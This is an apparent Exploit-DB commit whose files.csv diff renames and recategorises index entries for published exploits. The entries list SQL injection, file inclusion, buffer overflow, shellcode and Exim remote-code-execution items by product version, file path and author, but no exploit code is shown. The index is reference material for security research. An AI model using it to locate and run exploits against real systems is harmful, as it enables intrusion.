DB: 2016-10-05

3 new exploits CS-Cart 1.3.3 - (classes_dir) Remote File Inclusion CS-Cart 1.3.3 - 'classes_dir' Remote File Inclusion E-SMARTCART 1.0 - (Product_ID) SQL Injection E-Smart Cart 1.0 - 'Product_ID' SQL Injection E-SMART CART - 'productsofcat.asp' SQL Injection E-Smart Cart - 'productsofcat.asp' SQL Injection CS-Cart 2.0.0 Beta 3 - (Product_ID) SQL Injection CS-Cart 2.0.0 Beta 3 - 'Product_ID' SQL Injection E-Smartcart - SQL Injection E-Smart Cart - SQL Injection CubeCart PHP (shipkey parameter) 4.3.x - SQL Injection CubeCart PHP 4.3.x - 'shipkey' SQL Injection CS Cart 1.3.3 - (install.php) Cross-Site Scripting CS-Cart 1.3.3 - 'install.php' Cross-Site Scripting dansie shopping cart 3.0.4 - Multiple Vulnerabilities Dansie Shopping Cart 3.0.4 - Multiple Vulnerabilities Sendmail 8.11.6 - Address Prescan Memory Corruption Joomla! Component RSfiles (cid parameter) - SQL Injection Joomla! Component RSfiles - (cid parameter) SQL Injection Dovecot with Exim sender_address Parameter - Remote Command Execution Dovecot with Exim - sender_address Parameter Remote Command Execution Exim sender_address Parameter - Remote Code Execution Exim - sender_address Parameter Remote Code Execution PHP 4.x/5.0/5.1 with Sendmail Mail Function additional_parameters - Argument Arbitrary File Creation PHP 4.x/5.0/5.1 with Sendmail Mail Function - additional_parameters Argument Arbitrary File Creation Simplog 0.9.3 BlogID Parameter - Multiple SQL Injections Simplog 0.9.3 - BlogID Parameter Multiple SQL Injections E-SMART CART - 'Members Login' Multiple SQL Injection Vulnerabilities E-Smart Cart - 'Members Login' Multiple SQL Injection Vulnerabilities MW6 Technologies Aztec ActiveX (Data parameter) - Buffer Overflow MW6 Technologies Datamatrix - ActiveX (Data Parameter) - Buffer Overflow MW6 Technologies MaxiCode ActiveX (Data parameter) - Buffer Overflow MW6 Technologies Aztec ActiveX - (Data parameter) Buffer Overflow MW6 Technologies Datamatrix ActiveX - (Data Parameter) - Buffer Overflow MW6 Technologies MaxiCode ActiveX - (Data parameter) Buffer Overflow WordPress Plugin Recipes Blog 'id' Parameter - SQL Injection WordPress Plugin Recipes Blog - 'id' Parameter SQL Injection Le Forum 'Fichier_Acceuil' Parameter - Remote File Inclusion Le Forum - 'Fichier_Acceuil' Parameter Remote File Inclusion eFront 3.6.14.4 (surname parameter) - Persistent Cross-Site Scripting eFront 3.6.14.4 - (surname parameter) Persistent Cross-Site Scripting WordPress Plugin Safe Search 'v1' Parameter - Cross-Site Scripting WordPress Plugin Safe Search - 'v1' Parameter Cross-Site Scripting WordPress Plugin Twitter Feed 'url' Parameter - Cross-Site Scripting WordPress Plugin Twitter Feed - 'url' Parameter Cross-Site Scripting WordPress Plugin GD Star Rating 'votes' Parameter - SQL Injection WordPress Plugin GD Star Rating - 'votes' Parameter SQL Injection AJ Classifieds 'listingid' Parameter - SQL Injection AJ Classifieds - 'listingid' Parameter SQL Injection PHP Prior to 5.3.7 - Multiple Null Pointer Dereference Denial Of Service Vulnerabilities PHP < 5.3.7 - Multiple Null Pointer Dereference Denial Of Service Vulnerabilities Opera Web Browser Prior to 11.60 - Multiple Denial of Service / Unspecified Vulnerabilities Opera Web Browser < 11.60 - Multiple Denial of Service / Unspecified Vulnerabilities Bind 9 DNS Server - Denial of Service Linux Kernel 3.10.0-229.x (RHEL 7.1 / CentOS) - 'snd-usb-audio' Crash (PoC) Linux Kernel 3.10.0-229.x (RHEL 7.1 / CentOS) - 'iowarrior' Driver Crash (PoC) Linux Kernel 3.10.0-229.x (CentOS / RHEL 7.1) - 'snd-usb-audio' Crash (PoC) Linux Kernel 3.10.0-229.x (CentOS / RHEL 7.1) - 'iowarrior' Driver Crash (PoC) OpenCart 2.1.0.2 to 2.2.0.0 - json_decode Function Remote Code Execution OpenCart 2.1.0.2 < 2.2.0.0 - json_decode Function Remote Code Execution Disk Pulse Enterprise 9.0.34 - Buffer Overflow
2016-10-05 05:01:18 +00:00 · 2016-10-05 05:01:18 +00:00 · 77681134f4
commit 77681134f4
parent d9bdc2e376
4 changed files with 326 additions and 30 deletions
--- a/files.csv
+++ b/files.csv
@ -1583,7 +1583,7 @@ id,file,description,date,author,platform,type,port
 1869,platforms/php/webapps/1869.php,"DotClear 1.2.4 - (prepend.php) Arbitrary Remote File Inclusion",2006-06-03,rgod,php,webapps,0
 1870,platforms/php/webapps/1870.txt,"BlueShoes Framework 4.6 - Remote File Inclusion",2006-06-03,Kacper,php,webapps,0
 1871,platforms/php/webapps/1871.txt,"WebspotBlogging 3.0.1 - (path) Remote File Inclusion",2006-06-03,Kacper,php,webapps,0
-1872,platforms/php/webapps/1872.txt,"CS-Cart 1.3.3 - (classes_dir) Remote File Inclusion",2006-06-03,Kacper,php,webapps,0
+1872,platforms/php/webapps/1872.txt,"CS-Cart 1.3.3 - 'classes_dir' Remote File Inclusion",2006-06-03,Kacper,php,webapps,0
 1873,platforms/asp/webapps/1873.txt,"ProPublish 2.0 - 'catid' SQL Injection",2006-06-03,FarhadKey,asp,webapps,0
 1874,platforms/php/webapps/1874.php,"LifeType 1.0.4 - SQL Injection",2006-06-03,rgod,php,webapps,0
 1875,platforms/php/webapps/1875.htm,"FunkBoard CF0.71 - 'profile.php' Remote User Pass Change Exploit",2006-06-04,ajann,php,webapps,0
@ -2750,7 +2750,7 @@ id,file,description,date,author,platform,type,port
 3071,platforms/windows/local/3071.c,"Microsoft Vista - (NtRaiseHardError) Privilege Escalation",2007-01-03,erasmus,windows,local,0
 3072,platforms/windows/remote/3072.py,"Apple QuickTime (Windows 2000) - (rtsp URL Handler) Buffer Overflow",2007-01-03,"Winny Thomas",windows,remote,0
 3073,platforms/asp/webapps/3073.txt,"LocazoList 2.01a beta5 - (subcatID) SQL Injection",2007-01-03,ajann,asp,webapps,0
-3074,platforms/asp/webapps/3074.txt,"E-SMARTCART 1.0 - (Product_ID) SQL Injection",2007-01-03,ajann,asp,webapps,0
+3074,platforms/asp/webapps/3074.txt,"E-Smart Cart 1.0 - 'Product_ID' SQL Injection",2007-01-03,ajann,asp,webapps,0
 3075,platforms/php/webapps/3075.pl,"VerliAdmin 0.3 - (language.php) Local File Inclusion",2007-01-03,Kw3[R]Ln,php,webapps,0
 3076,platforms/php/webapps/3076.php,"Simple Web Content Management System - SQL Injection",2007-01-03,DarkFig,php,webapps,0
 3077,platforms/osx/remote/3077.rb,"Apple QuickTime 7.1.3 - (HREFTrack) Cross-Zone Scripting Exploit",2007-01-03,MoAB,osx,remote,0
@ -5432,7 +5432,7 @@ id,file,description,date,author,platform,type,port
 5802,platforms/php/webapps/5802.txt,"WebChamado 1.1 - (tsk_id) SQL Injection",2008-06-13,"Virangar Security",php,webapps,0
 5803,platforms/php/webapps/5803.txt,"Pre News Manager 1.0 - (index.php id) SQL Injection",2008-06-13,K-159,php,webapps,0
 5804,platforms/php/webapps/5804.txt,"Pre Ads Portal 2.0 - SQL Injection",2008-06-13,K-159,php,webapps,0
-5805,platforms/asp/webapps/5805.txt,"E-SMART CART - 'productsofcat.asp' SQL Injection",2008-06-13,JosS,asp,webapps,0
+5805,platforms/asp/webapps/5805.txt,"E-Smart Cart - 'productsofcat.asp' SQL Injection",2008-06-13,JosS,asp,webapps,0
 5806,platforms/php/webapps/5806.pl,"GLLCTS2 - 'listing.php sort' Blind SQL Injection",2008-06-13,anonymous,php,webapps,0
 5807,platforms/php/webapps/5807.txt,"PHP JOBWEBSITE PRO - 'JobSearch3.php' SQL Injection",2008-06-13,JosS,php,webapps,0
 5808,platforms/php/webapps/5808.txt,"Mambo 4.6.4 - (Output.php) Remote File Inclusion",2008-06-13,irk4z,php,webapps,0
@ -7705,7 +7705,7 @@ id,file,description,date,author,platform,type,port
 8181,platforms/php/webapps/8181.c,"PHP Director 0.21 - (sql into outfile) eval() Injection",2009-03-09,StAkeR,php,webapps,0
 8182,platforms/php/webapps/8182.txt,"PHPRecipeBook 2.24 - 'base_id' SQL Injection",2009-03-09,d3b4g,php,webapps,0
 8183,platforms/php/webapps/8183.txt,"woltlab burning board 3.0.x - Multiple Vulnerabilities",2009-03-09,StAkeR,php,webapps,0
-8184,platforms/php/webapps/8184.txt,"CS-Cart 2.0.0 Beta 3 - (Product_ID) SQL Injection",2009-03-09,netsoul,php,webapps,0
+8184,platforms/php/webapps/8184.txt,"CS-Cart 2.0.0 Beta 3 - 'Product_ID' SQL Injection",2009-03-09,netsoul,php,webapps,0
 8185,platforms/php/webapps/8185.txt,"phpCommunity 2.1.8 - (SQL Injection / Directory Traversal / Cross-Site Scripting) Multiple Vulnerabilities",2009-03-09,"Salvatore Fresta",php,webapps,0
 8186,platforms/php/webapps/8186.txt,"PHP-Fusion Mod Book Panel - (bookid) SQL Injection",2009-03-09,elusiven,php,webapps,0
 8187,platforms/hardware/dos/8187.sh,"Addonics NAS Adapter - Authenticated Denial of Service",2009-03-09,h00die,hardware,dos,0
@ -9792,7 +9792,7 @@ id,file,description,date,author,platform,type,port
 10534,platforms/php/webapps/10534.txt,"Rumba XM - Cross-Site Scripting",2009-12-17,"Hadi Kiamarsi",php,webapps,0
 10535,platforms/php/webapps/10535.txt,"WordPress Plugin Pyrmont 2.x - SQL Injection",2009-12-18,Gamoscu,php,webapps,0
 10537,platforms/php/webapps/10537.txt,"gpEasy 1.5RC3 - Remote File Inclusion",2009-12-18,"cr4wl3r ",php,webapps,0
-10540,platforms/asp/webapps/10540.txt,"E-Smartcart - SQL Injection",2009-12-18,R3d-D3V!L,asp,webapps,0
+10540,platforms/asp/webapps/10540.txt,"E-Smart Cart - SQL Injection",2009-12-18,R3d-D3V!L,asp,webapps,0
 10542,platforms/windows/remote/10542.py,"TFTP Server 1.4 - Buffer Overflow Remote Exploit (2)",2009-12-18,Molotov,windows,remote,69
 10543,platforms/php/webapps/10543.txt,"Schweizer NISADA Communication CMS - SQL Injection",2009-12-18,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
 10544,platforms/multiple/local/10544.html,"Mozilla Firefox - Location Bar Spoofing",2009-12-18,"Jordi Chancel",multiple,local,0
@ -12430,7 +12430,7 @@ id,file,description,date,author,platform,type,port
 14111,platforms/php/webapps/14111.txt,"Allomani - Super MultiMedia 2.5 - Cross-Site Request Forgery (Add Admin)",2010-06-29,G0D-F4Th3r,php,webapps,0
 14112,platforms/php/webapps/14112.txt,"PageDirector CMS - 'result.php' SQL Injection",2010-06-29,v3n0m,php,webapps,0
 14115,platforms/windows/webapps/14115.txt,"Gekko CMS - SQL Injection",2010-06-29,[]0iZy5,windows,webapps,80
-14117,platforms/multiple/webapps/14117.txt,"CubeCart PHP (shipkey parameter) 4.3.x - SQL Injection",2010-06-29,"Core Security",multiple,webapps,80
+14117,platforms/multiple/webapps/14117.txt,"CubeCart PHP 4.3.x - 'shipkey' SQL Injection",2010-06-29,"Core Security",multiple,webapps,80
 30100,platforms/windows/remote/30100.html,"British TeleCommunications Consumer Webhelper 2.0.0.7 - Multiple Buffer Overflow Vulnerabilities",2007-05-29,"Will Dormann",windows,remote,0
 14118,platforms/multiple/webapps/14118.txt,"LIOOSYS CMS - 'news.php' SQL Injection",2010-06-29,GlaDiaT0R,multiple,webapps,80
 14119,platforms/lin_x86/shellcode/14119.c,"Linux/x86 - Polymorphic /bin/sh Shellcode (116 bytes)",2010-06-29,gunslinger_,lin_x86,shellcode,0
@ -13062,7 +13062,7 @@ id,file,description,date,author,platform,type,port
 14959,platforms/windows/local/14959.py,"Acoustica MP3 Audio Mixer 2.471 - Extended M3U directives SEH Exploit",2010-09-09,"Carlos Mario Penagos Hollmann",windows,local,0
 14960,platforms/php/webapps/14960.txt,"ES Simple Download 1.0. - Local File Inclusion",2010-09-09,Kazza,php,webapps,0
 14961,platforms/win_x86/local/14961.py,"Audiotran 1.4.2.4 - SEH Overflow",2010-09-09,"Abhishek Lyall",win_x86,local,0
-14962,platforms/multiple/webapps/14962.txt,"CS Cart 1.3.3 - (install.php) Cross-Site Scripting",2010-09-09,crmpays,multiple,webapps,80
+14962,platforms/multiple/webapps/14962.txt,"CS-Cart 1.3.3 - 'install.php' Cross-Site Scripting",2010-09-09,crmpays,multiple,webapps,80
 14964,platforms/php/webapps/14964.txt,"Joomla! Component com_jphone - Local File Inclusion",2010-09-10,"Chip d3 bi0s",php,webapps,0
 14965,platforms/php/webapps/14965.txt,"fcms 2.2.3 - Remote File Inclusion",2010-09-10,LoSt.HaCkEr,php,webapps,0
 14967,platforms/windows/dos/14967.txt,"Webkit (Apple Safari < 4.1.2/5.0.2 & Google Chrome < 5.0.375.125) - Memory Corruption",2010-09-10,"Jose A. Vazquez",windows,dos,0
@ -17221,7 +17221,7 @@ id,file,description,date,author,platform,type,port
 19849,platforms/unix/remote/19849.pm,"UoW imapd 10.234/12.264 - COPY Buffer Overflow (Metasploit)",2000-04-16,vlad902,unix,remote,0
 19850,platforms/linux/dos/19850.c,"RedHat Linux 6.x - X Font Server Denial of Service / Buffer Overflow Vulnerabilities",2000-04-16,"Michal Zalewski",linux,dos,0
 19851,platforms/qnx/local/19851.c,"QSSL QNX 4.25 A - crypt() Exploit",2000-04-15,Sean,qnx,local,0
-19852,platforms/cgi/remote/19852.txt,"dansie shopping cart 3.0.4 - Multiple Vulnerabilities",2000-04-14,"tombow & Randy Janinda",cgi,remote,0
+19852,platforms/cgi/remote/19852.txt,"Dansie Shopping Cart 3.0.4 - Multiple Vulnerabilities",2000-04-14,"tombow & Randy Janinda",cgi,remote,0
 19853,platforms/windows/dos/19853.txt,"FrontPage 97/98 - Server Image Mapper Buffer Overflow",2000-04-19,Narrow,windows,dos,0
 19854,platforms/netware/dos/19854.sh,"Novell Netware 5.1 - Remote Administration Buffer Overflow",2000-04-19,"Michal Zalewski",netware,dos,0
 19855,platforms/windows/local/19855.txt,"Panda Security 3.0 - Multiple Vulnerabilities",2000-04-17,Zan,windows,local,0
@ -19725,7 +19725,7 @@ id,file,description,date,author,platform,type,port
 22439,platforms/php/webapps/22439.txt,"PostNuke 0.72x Members_List Module - Full Path Disclosure",2003-03-28,rkc,php,webapps,0
 22440,platforms/hardware/dos/22440.c,"D-Link DI-614+ - IP Fragment Reassembly Denial of Service",1998-04-16,humble,hardware,dos,0
 22441,platforms/multiple/dos/22441.txt,"Mozilla 1.x / Opera 7.0 - LiveConnect JavaScript Denial of Service",2003-03-28,"Marc Schoenefeld",multiple,dos,0
-22442,platforms/unix/remote/22442.c,"Sendmail 8.11.6 - Address Prescan Memory Corruption",2003-03-29,sorbo,unix,remote,0
+22442,platforms/unix/local/22442.c,"Sendmail 8.11.6 - Address Prescan Memory Corruption",2003-03-29,sorbo,unix,local,0
 22443,platforms/php/webapps/22443.txt,"Beanwebb Guestbook 1.0 - Unauthorized Administrative Access",2003-03-29,euronymous,php,webapps,0
 22444,platforms/php/webapps/22444.txt,"Justice Guestbook 1.3 - Full Path Disclosure",2003-03-29,euronymous,php,webapps,0
 22445,platforms/php/webapps/22445.txt,"ScozBook 1.1 - Full Path Disclosure",2003-03-29,euronymous,php,webapps,0
@ -22051,7 +22051,7 @@ id,file,description,date,author,platform,type,port
 24848,platforms/linux/remote/24848.txt,"ChBg 1.5 - Scenario File Overflow",2004-12-15,"Danny Lungstrom",linux,remote,0
 24849,platforms/php/webapps/24849.txt,"DaloRadius - Multiple Vulnerabilities",2013-03-18,"Saadi Siddiqui",php,webapps,0
 24850,platforms/php/webapps/24850.txt,"WordPress Plugin Simply Poll 1.4.1 - Multiple Vulnerabilities",2013-03-18,m3tamantra,php,webapps,0
-24851,platforms/php/webapps/24851.txt,"Joomla! Component RSfiles (cid parameter) - SQL Injection",2013-03-18,ByEge,php,webapps,0
+24851,platforms/php/webapps/24851.txt,"Joomla! Component RSfiles - (cid parameter) SQL Injection",2013-03-18,ByEge,php,webapps,0
 24855,platforms/php/dos/24855.txt,"PHP 3/4/5 - Multiple Local And Remote Vulnerabilities (2)",2004-12-15,Slythers,php,dos,0
 24856,platforms/linux/remote/24856.c,"NapShare 1.2 - Remote Buffer Overflow (1)",2004-12-06,"Bartlomiej Sieka",linux,remote,0
 24857,platforms/linux/remote/24857.c,"NapShare 1.2 - Remote Buffer Overflow (2)",2004-12-10,"Bartlomiej Sieka",linux,remote,0
@ -22481,7 +22481,7 @@ id,file,description,date,author,platform,type,port
 25775,platforms/linux/remote/25775.rb,"Nginx 1.3.9 < 1.4.0 - Chuncked Encoding Stack Buffer Overflow (Metasploit)",2013-05-28,Metasploit,linux,remote,80
 25295,platforms/hardware/dos/25295.txt,"Huawei SNMPv3 Service - Multiple Buffer Overflow Vulnerabilities",2013-05-07,"Roberto Paleari",hardware,dos,0
 25296,platforms/windows/local/25296.rb,"AudioCoder - '.m3u' Buffer Overflow (Metasploit)",2013-05-07,Metasploit,windows,local,0
-25297,platforms/linux/remote/25297.txt,"Dovecot with Exim sender_address Parameter - Remote Command Execution",2013-05-07,"RedTeam Pentesting GmbH",linux,remote,0
+25297,platforms/linux/remote/25297.txt,"Dovecot with Exim - sender_address Parameter Remote Command Execution",2013-05-07,"RedTeam Pentesting GmbH",linux,remote,0
 25298,platforms/php/webapps/25298.txt,"b2evolution 4.1.6 - Multiple Vulnerabilities",2013-05-07,"High-Tech Bridge SA",php,webapps,80
 25299,platforms/php/webapps/25299.txt,"Tkai's Shoutbox - Query Parameter URI redirection",2005-03-28,CorryL,php,webapps,0
 25300,platforms/php/webapps/25300.txt,"EXoops - Multiple Input Validation Vulnerabilities",2005-03-28,"Diabolic Crab",php,webapps,0
@ -23164,7 +23164,7 @@ id,file,description,date,author,platform,type,port
 25967,platforms/hardware/dos/25967.txt,"Cisco CallManager 1.0/2.0/3.x/4.0 - CTI Manager Remote Denial of Service",2005-07-12,"Jeff Fay",hardware,dos,0
 25968,platforms/hardware/webapps/25968.pl,"Seowonintech Routers fw: 2.3.9 - Remote Root File Disclosure",2013-06-05,"Todor Donev",hardware,webapps,0
 25969,platforms/hardware/webapps/25969.txt,"Netgear WPN824v3 - Unauthorized Config Download",2013-06-05,"Jens Regel",hardware,webapps,0
-25970,platforms/linux/remote/25970.py,"Exim sender_address Parameter - Remote Code Execution",2013-06-05,eKKiM,linux,remote,0
+25970,platforms/linux/remote/25970.py,"Exim - sender_address Parameter Remote Code Execution",2013-06-05,eKKiM,linux,remote,0
 25971,platforms/php/webapps/25971.txt,"Cuppa CMS - 'alertConfigField.php urlConfig Parameter' Remote / Local File Inclusion",2013-06-05,"CWH Underground",php,webapps,0
 25972,platforms/windows/dos/25972.py,"PEStudio 3.69 - Denial of Service",2013-06-05,"Debasish Mandal",windows,dos,0
 25973,platforms/php/webapps/25973.txt,"Ruubikcms 1.1.1 - (tinybrowser.php folder Parameter) Directory Traversal",2013-06-05,expl0i13r,php,webapps,0
@ -24513,7 +24513,7 @@ id,file,description,date,author,platform,type,port
 27331,platforms/php/webapps/27331.txt,"n8cms 1.1/1.2 - 'index.php' Multiple Parameter Cross-Site Scripting",2006-02-27,Liz0ziM,php,webapps,0
 27332,platforms/php/webapps/27332.txt,"n8cms 1.1/1.2 - mailto.php userid Parameter Cross-Site Scripting",2006-02-27,Liz0ziM,php,webapps,0
 27333,platforms/php/webapps/27333.txt,"QwikiWiki 1.4 - 'index.php' Cross-Site Scripting",2006-02-28,Dr^Death,php,webapps,0
-27334,platforms/php/local/27334.txt,"PHP 4.x/5.0/5.1 with Sendmail Mail Function additional_parameters - Argument Arbitrary File Creation",2006-02-28,ced.clerget@free.fr,php,local,0
+27334,platforms/php/local/27334.txt,"PHP 4.x/5.0/5.1 with Sendmail Mail Function - additional_parameters Argument Arbitrary File Creation",2006-02-28,ced.clerget@free.fr,php,local,0
 27335,platforms/php/local/27335.txt,"PHP 4.x/5.0/5.1 - mb_send_mail() Function Parameter Restriction Bypass",2006-02-28,ced.clerget@free.fr,php,local,0
 27336,platforms/php/webapps/27336.txt,"EJ3 TOPo 2.2.178 - Inc_header.php Cross-Site Scripting",2006-02-28,"Yunus Emre Yilmaz",php,webapps,0
 27337,platforms/php/webapps/27337.txt,"Mozilla Thunderbird 1.5 - Multiple Remote Information Disclosure Vulnerabilities",2006-02-28,Crashfr,php,webapps,0
@ -26005,7 +26005,7 @@ id,file,description,date,author,platform,type,port
 28903,platforms/php/webapps/28903.txt,"ac4p Mobile - send.php cats Parameter Cross-Site Scripting",2006-11-03,AL-garnei,php,webapps,0
 28904,platforms/php/webapps/28904.txt,"ac4p Mobile - up.php Multiple Parameter Cross-Site Scripting",2006-11-03,AL-garnei,php,webapps,0
 28905,platforms/php/webapps/28905.txt,"ac4p Mobile - cp/index.php pagenav Parameter Cross-Site Scripting",2006-11-03,AL-garnei,php,webapps,0
-28906,platforms/php/webapps/28906.txt,"Simplog 0.9.3 BlogID Parameter - Multiple SQL Injections",2006-11-03,"Benjamin Moss",php,webapps,0
+28906,platforms/php/webapps/28906.txt,"Simplog 0.9.3 - BlogID Parameter Multiple SQL Injections",2006-11-03,"Benjamin Moss",php,webapps,0
 28907,platforms/php/webapps/28907.txt,"Simplog 0.9.3 - archive.php PID Parameter Cross-Site Scripting",2006-11-03,"Benjamin Moss",php,webapps,0
 28908,platforms/php/webapps/28908.txt,"Advanced Guestbook 2.3.1 - admin.php Remote File Inclusion",2006-11-03,BrokeN-ProXy,php,webapps,0
 28909,platforms/php/webapps/28909.txt,"IF-CMS - 'index.php' Cross-Site Scripting",2006-11-04,"Benjamin Moss",php,webapps,0
@ -28015,7 +28015,7 @@ id,file,description,date,author,platform,type,port
 31056,platforms/windows/remote/31056.py,"Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Security Vulnerabilities",2008-01-23,"Felipe M. Aragon",windows,remote,0
 31057,platforms/osx/dos/31057.html,"Apple iOS Mobile Safari - Memory Exhaustion Remote Denial of Service",2008-01-24,fuzion,osx,dos,0
 31058,platforms/asp/webapps/31058.txt,"Pre Hotel and Resorts - 'user_login.asp' Multiple SQL Injection Vulnerabilities",2008-01-25,milad_sa2007,asp,webapps,0
-31059,platforms/asp/webapps/31059.txt,"E-SMART CART - 'Members Login' Multiple SQL Injection Vulnerabilities",2008-01-25,milad_sa2007,asp,webapps,0
+31059,platforms/asp/webapps/31059.txt,"E-Smart Cart - 'Members Login' Multiple SQL Injection Vulnerabilities",2008-01-25,milad_sa2007,asp,webapps,0
 31060,platforms/php/webapps/31060.txt,"Drake CMS 0.4.9 - 'index.php' Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0
 31061,platforms/php/webapps/31061.txt,"Trixbox 2.4.2 - user/index.php Query String Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0
 31062,platforms/php/webapps/31062.txt,"Trixbox 2.4.2 - maint/index.php Query String Cross-Site Scripting",2008-01-25,"Omer Singer",php,webapps,0
@ -28133,9 +28133,9 @@ id,file,description,date,author,platform,type,port
 31173,platforms/php/webapps/31173.txt,"pChart 2.1.3 - Multiple Vulnerabilities",2014-01-24,"Balazs Makany",php,webapps,80
 31174,platforms/php/webapps/31174.txt,"Joomla! Extension Komento 1.7.2 - Persistent Cross-Site Scripting",2014-01-24,"High-Tech Bridge SA",php,webapps,80
 31175,platforms/php/webapps/31175.txt,"Joomla! Extension JV Comment 3.0.2 - (index.php id Parameter) SQL Injection",2014-01-24,"High-Tech Bridge SA",php,webapps,80
-31176,platforms/windows/dos/31176.html,"MW6 Technologies Aztec ActiveX (Data parameter) - Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0
+31176,platforms/windows/dos/31176.html,"MW6 Technologies Aztec ActiveX - (Data parameter) Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0
-31177,platforms/windows/dos/31177.html,"MW6 Technologies Datamatrix - ActiveX (Data Parameter) - Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0
+31177,platforms/windows/dos/31177.html,"MW6 Technologies Datamatrix ActiveX - (Data Parameter) - Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0
-31178,platforms/windows/dos/31178.html,"MW6 Technologies MaxiCode ActiveX (Data parameter) - Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0
+31178,platforms/windows/dos/31178.html,"MW6 Technologies MaxiCode ActiveX - (Data parameter) Buffer Overflow",2014-01-24,"Pedro Ribeiro",windows,dos,0
 31179,platforms/windows/remote/31179.html,"Daum Game 1.1.0.5 - ActiveX (IconCreate Method) Stack Buffer Overflow",2014-01-24,"Trustwave's SpiderLabs",windows,remote,0
 31180,platforms/hardware/webapps/31180.txt,"Franklin Fueling TS-550 evo 2.0.0.6833 - Multiple Vulnerabilities",2014-01-24,"Trustwave's SpiderLabs",hardware,webapps,10001
 31181,platforms/windows/remote/31181.rb,"HP Data Protector - Backup Client Service Directory Traversal (Metasploit)",2014-01-24,Metasploit,windows,remote,5555
@ -28196,7 +28196,7 @@ id,file,description,date,author,platform,type,port
 31225,platforms/php/webapps/31225.html,"RunCMS 1.6.1 - 'admin.php' Cross-Site Scripting",2008-02-18,NBBN,php,webapps,0
 31226,platforms/php/webapps/31226.txt,"Joomla! / Mambo Component com_detail - 'id' Parameter SQL Injection",2008-02-18,S@BUN,php,webapps,0
 31227,platforms/php/webapps/31227.txt,"Yellow Swordfish Simple Forum 1.x - 'sf-profile.php' SQL Injection",2008-02-18,S@BUN,php,webapps,0
-31228,platforms/php/webapps/31228.txt,"WordPress Plugin Recipes Blog 'id' Parameter - SQL Injection",2008-02-18,S@BUN,php,webapps,0
+31228,platforms/php/webapps/31228.txt,"WordPress Plugin Recipes Blog - 'id' Parameter SQL Injection",2008-02-18,S@BUN,php,webapps,0
 31229,platforms/php/webapps/31229.txt,"ProjectPier 0.8 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2008-02-18,L4teral,php,webapps,0
 31230,platforms/php/webapps/31230.txt,"WordPress Plugin wp-people 2.0 - 'wp-people-popup.php' SQL Injection",2008-02-18,S@BUN,php,webapps,0
 31231,platforms/windows/remote/31231.txt,"SIMM-Comm SCI Photo Chat 3.4.9 - Directory Traversal",2008-02-19,"Luigi Auriemma",windows,remote,0
@ -28229,7 +28229,7 @@ id,file,description,date,author,platform,type,port
 31331,platforms/php/webapps/31331.txt,"PHP-Nuke eGallery 3.0 Module - 'pid' Parameter SQL Injection",2008-03-04,"Aria-Security Team",php,webapps,0
 31332,platforms/php/webapps/31332.txt,"PHP-Nuke 'Seminars' Module - 'Filename' Parameter Local File Inclusion",2008-03-04,The-0utl4w,php,webapps,0
 31333,platforms/bsd/dos/31333.txt,"BSD PPP 'pppx.conf' - Local Denial of Service",2008-03-04,sipherr,bsd,dos,0
-31528,platforms/php/webapps/31528.txt,"Le Forum 'Fichier_Acceuil' Parameter - Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
+31528,platforms/php/webapps/31528.txt,"Le Forum - 'Fichier_Acceuil' Parameter Remote File Inclusion",2008-03-24,ZoRLu,php,webapps,0
 31462,platforms/linux/remote/31462.c,"xine-lib - Multiple Heap Based Remote Buffer Overflow Vulnerabilities",2008-03-20,"Luigi Auriemma",linux,remote,0
 31330,platforms/windows/dos/31330.txt,"Borland VisiBroker Smart Agent 08.00.00.C1.03 - Multiple Remote Vulnerabilities",2008-03-03,"Luigi Auriemma",windows,dos,0
 31260,platforms/windows/remote/31260.py,"haneWIN DNS Server 1.5.3 - Buffer Overflow (SEH)",2014-01-29,"Dario Estrada",windows,remote,53
@ -30444,7 +30444,7 @@ id,file,description,date,author,platform,type,port
 33705,platforms/windows/remote/33705.txt,"Authentium Command On Demand ActiveX Control - Multiple Buffer Overflow Vulnerabilities",2010-03-04,"Nikolas Sotiriu",windows,remote,0
 33706,platforms/php/webapps/33706.txt,"Drupal < 6.16 / 5.22 - Multiple Security Vulnerabilities",2010-03-04,"David Rothstein",php,webapps,0
 33704,platforms/asp/webapps/33704.txt,"BBSXP 2008 - 'ShowPost.asp' Cross-Site Scripting",2010-03-04,Liscker,asp,webapps,0
-33697,platforms/php/webapps/33697.txt,"eFront 3.6.14.4 (surname parameter) - Persistent Cross-Site Scripting",2014-06-09,"shyamkumar somana",php,webapps,80
+33697,platforms/php/webapps/33697.txt,"eFront 3.6.14.4 - (surname parameter) Persistent Cross-Site Scripting",2014-06-09,"shyamkumar somana",php,webapps,80
 33699,platforms/php/webapps/33699.txt,"WebTitan 4.01 (Build 68) - Multiple Vulnerabilities",2014-06-09,"SEC Consult",php,webapps,80
 33700,platforms/asp/webapps/33700.txt,"DevExpress ASPxFileManager 10.2 < 13.2.8 - Directory Traversal",2014-06-09,"RedTeam Pentesting",asp,webapps,80
 33702,platforms/php/webapps/33702.txt,"ZeroCMS 1.0 - (zero_view_article.php article_id Parameter) SQL Injection",2014-06-10,LiquidWorm,php,webapps,80
@ -31678,7 +31678,7 @@ id,file,description,date,author,platform,type,port
 35064,platforms/php/webapps/35064.txt,"Zimplit CMS - English_manual_version_2.php client Parameter Cross-Site Scripting",2010-12-07,"High-Tech Bridge SA",php,webapps,0
 35065,platforms/asp/webapps/35065.txt,"SolarWinds Orion Network Performance Monitor (NPM) 10.1 - Multiple Cross-Site Scripting Vulnerabilities",2010-12-07,x0skel,asp,webapps,0
 35066,platforms/php/webapps/35066.txt,"WordPress Plugin Processing Embed 0.5 - 'pluginurl' Parameter Cross-Site Scripting",2010-12-08,"John Leitch",php,webapps,0
-35067,platforms/php/webapps/35067.txt,"WordPress Plugin Safe Search 'v1' Parameter - Cross-Site Scripting",2010-12-08,"John Leitch",php,webapps,0
+35067,platforms/php/webapps/35067.txt,"WordPress Plugin Safe Search - 'v1' Parameter Cross-Site Scripting",2010-12-08,"John Leitch",php,webapps,0
